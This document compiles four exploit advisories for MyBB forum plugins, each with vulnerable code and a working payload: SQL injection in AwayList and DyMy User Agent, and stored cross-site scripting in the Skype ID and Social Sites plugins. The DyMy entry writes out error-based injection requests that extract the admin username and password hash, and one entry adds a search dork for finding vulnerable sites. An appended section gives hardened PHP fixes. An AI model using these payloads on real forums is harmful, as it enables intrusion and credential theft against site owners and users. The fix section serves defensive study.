AwayList MyBB plugin SQLi 0day
Profile Skype ID MyBB Plugin Stored XSS
Social Sites MyBB Plugin 0.2.2 Cross Site Scripting
MyBB DyMy User Agent Plugin SQL injection vulnerability
Code:
# Exploit Title: AwayList MyBB plugin SQLi 0day
# Exploit Author: Red_Hat [Team Vect0r]
# Software Link: http://mods.mybb.com/view/awaylist
# Tested on: Windows & Linux.

Vulnerable code:

<?php
$query = $db->simple_select(              // 245
    "awaylist",
    '*',
    "id = '" . $mybb->input['id'] . "'"   // 246
);                                        // 247
$item = $db->fetch_array($query);         // 248
?>

The variable '$mybb->input['id']' remains unsanitized.

Usage:
http://server/index.php?action=editAwlItem&id=[SQLi]

Shoutout to Zixem <3 & Team Vect0r :3
Code:
# Exploit Title: Profile Skype ID MyBB Plugin Stored XSS
# Date: 14/12/2012
# Exploit Author: limb0
# Vendor Homepage: http://www.dragonknightz.net/
# Software Link: http://mods.mybb.com/view/user-profile-skype-id
# Version: 1.0
# Category: Web Security
# Tested on: Linux

+------------------------------------------------------------+
Stored XSS - Instructions
1. Install & Activate plugin
2. Go to UserCP >> Edit Profile >> Skype ID:
3. Inject your string (xss), ex. "><script>alert("Skype ID XSS")</script>
4. Visit your profile and voila

Proof
Inject: https://imageshack.us/photo/my-images/22/screenshotfrom201212141.png/
Result: https://imageshack.us/photo/my-images/41/screenshotfrom201212141.png/
+-------------------------------------------------------------+

Vulnerable code:

function profileskype_update($skype)
{
    global $mybb;
    if (isset($mybb->input['skype']))
    {
        $skype->user_update_data['skype'] = $mybb->input['skype'];
    }
}
Code:
# Exploit Title: Social Sites MyBB Plugin 0.2.2 Cross Site Scripting
# Google Dork: inurl:usercp.php?action=socialsites
# Date: 13.12.2012
# Exploit Author: s3m00t
# Vendor Homepage: http://mattrogowski.co.uk/mybb/
# Software Link: http://mods.mybb.com/view/social-sites
# Version: 0.2.2
# Tested on: PHP

Reason: Lack of input validation at several places.

Proof of Concept:
1. Navigate to "usercp.php?action=socialsites" and you will see a number of fields, as at http://i.imgur.com/0tz98.png.
2. Submit the input below into any of the fields:
   " /><script>alert(1)</script><img src="
3. The input will be stored as shown at http://i.imgur.com/Z8bYM.png

Solution: Replace the content of "inc/plugins/socialsites.php" with this script: http://pastebin.com/5JLdg4gh
Code:
############################################################################
# Exploit title : MyBB DyMy User Agent Plugin SQL injection vulnerability. #
# Author: JoinSe7en                                                        #
# Date : 13 Dec 2012                                                       #
# Tested on : Linux                                                        #
# Category : Web Applications                                              #
# Software Link : http://mods.mybb.com/view/dymy-user-agent                #
############################################################################

[*] PoC (receive admin username)

We fire up HTTP Live Headers or a similar tool, post something and press 'replay'.
We then replace our user agent with the following Query:

POST http://localhost/mybb/newreply.php?ajax=1

HTTP Headers:
Host: localhost
User-Agent: ' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)); #

Output:
SQL Error: 1062 - Duplicate entry 'admin1' for key 'group_key'

+------------------------------------------------------------------+

[*] PoC (receive admin password)

We then replace our user agent with the following Query:

POST http://localhost/mybb/newreply.php?ajax=1

HTTP Headers:
Host: localhost
User-Agent: ' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)); #

Output:
SQL Error: 1062 - Duplicate entry '098f6bcd4621d373cade4e832627b4f6' for key 'group_key'

+------------------------------------------------------------------+

Enjoy.
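As an added, defender-side example (not code from any of the plugins or advisories above): hardened forms of the AwayList and Skype ID snippets quoted above, plus the same escaping rule applied to a request header as the DyMy advisory requires. It assumes MyBB's standard `$db` and `$mybb` globals and the core `htmlspecialchars_uni()` helper; the `*_safe` function names and the assumption that the user datahandler does not escape plugin-added fields are mine.

```php
<?php
// Added example, not code from any plugin or advisory above. Assumes the
// standard MyBB globals $db and $mybb and the core helper
// htmlspecialchars_uni(); the *_safe function names are mine.

// AwayList fix: the id is numeric, so cast it before it reaches the query.
// intval() reduces any injected string to an integer (or 0), so the
// "id = '...'" clause can no longer be broken out of.
function awaylist_fetch_item_safe()
{
    global $db, $mybb;
    $id = intval($mybb->input['id']);
    $query = $db->simple_select("awaylist", "*", "id = '" . $id . "'");
    return $db->fetch_array($query);
}

// Skype ID fix, storage side: escape the value for SQL before handing it to
// the datahandler (assumption: the handler does not escape plugin-added
// fields, only its own known columns).
function profileskype_update_safe($skype)
{
    global $mybb, $db;
    if (isset($mybb->input['skype']))
    {
        $value = trim($mybb->input['skype']);
        $skype->user_update_data['skype'] = $db->escape_string($value);
    }
}

// Skype ID fix, output side: the stored XSS fires because the raw value is
// echoed into the profile template. Encoding at render time turns a stored
// "><script>...</script> payload into inert text, whatever was saved.
function profileskype_render_safe($skype_id)
{
    return htmlspecialchars_uni($skype_id);
}

// DyMy User Agent: the same rule applies to request headers. Whatever the
// plugin's own storage code looks like (not shown in the advisory), the
// header must pass through escape_string() before it is concatenated into SQL.
function useragent_for_sql_safe()
{
    global $db;
    $ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
    return $db->escape_string($ua);
}
```

Casting and escaping on the way in closes the three SQL injections; encoding on the way out is what actually neutralises the stored XSS, since the stored string itself is not the problem.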